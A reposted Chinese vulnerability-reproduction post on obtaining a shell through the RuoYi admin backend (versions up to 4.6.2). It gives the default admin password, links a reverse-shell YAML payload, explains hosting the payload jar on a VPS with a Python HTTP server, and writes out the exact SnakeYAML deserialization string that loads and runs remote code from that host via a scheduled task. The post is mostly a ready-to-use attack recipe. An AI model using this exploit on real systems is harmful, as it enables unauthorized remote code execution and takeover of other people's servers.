相關內容簡體繁體

若依后台Getshell

本文轉載自查看原文 2021-12-08 14:32 8763 漏洞復現

后台Getshell

RuoYi <= v4.6.2
默認admin/admin123
修改artsploit
windows主機反彈shell可以用https://github.com/bkfish/yaml-payload-for-Win
放到vps上，起一個python3
python3 -m http.server
配置完后，后台添加定時任務
org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://vpsip:8000/yaml-payload.jar"]]]]')
然后Con表達式設置成0/50 * * * * ?即可

歷史漏洞：
https://doc.ruoyi.vip/ruoyi/document/kslj.html#歷史漏洞
新增:
https://xz.aliyun.com/t/10637

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 Wordpress 后台GetShell總結 zblog后台getshell 網站后台getshell 通達OA后台getshell phpcms后台getshell weblogic弱口令+后台getshell Tomcat 后台war包getshell 【實戰】Tomcat管理后台Getshell Eyoucms 1.42 后台插件getshell 【實戰】Axis2后台Getshell

粵ICP備18138465號 © 2018-2025 CODEPRJ.COM